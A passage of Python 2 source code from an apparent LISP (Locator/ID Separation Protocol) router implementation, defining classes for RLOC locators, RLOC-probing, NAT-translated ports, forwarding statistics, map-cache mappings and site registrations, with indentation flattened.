return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string):
self.json_name = name
self.json_string = string
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and errors stats. Anytime a lisp_packet().
# packet_error value is added, this dictionary array needs to add the key
# string.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This a locator record definition as defined in RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def process_rloc_probe_reply(self, nonce, eid, group, hop_count, ttl):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
rloc.last_rloc_probe_reply = lisp_get_timestamp()
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
rloc.store_rloc_probe_hops(hop_count, ttl)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hop_count) + "/" + str(ttl)))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
self.gleaned_groups = []
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
ttl = str(ttl * 60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
# TTL is about to elapse. We need to refresh entry if we are 90%
# close to expiring.
#
almost_ttl = self.map_cache_ttl - (self.map_cache_ttl / 10)
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endif
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply (it will never get).
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put RLOC in lisp.lisp_rloc_probe_list if doesn't exist. And if
# we removed the RLOC out of the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length is 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
# IF this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachabile RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting an nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
#
def lisp_is_group_more_specific(group_str, group_mapping):
iid = group_mapping.group_prefix.instance_id
mask_len = group_mapping.group_prefix.mask_len
group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
if (group.is_more_specific(group_mapping.group_prefix)): return(mask_len)
return(-1)
#enddef
#
# lisp_lookup_group
#
# Lookup group addresss in lisp_group_mapping_list{}.
#
def lisp_lookup_group(group):
best = None
for gm in lisp_group_mapping_list.values():
mask_len = lisp_is_group_more_specific(group, gm)
if (mask_len == -1): continue
if (best == None or mask_len > best.group_prefix.mask_len): best = gm
#endfor
return(best)
#enddef
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
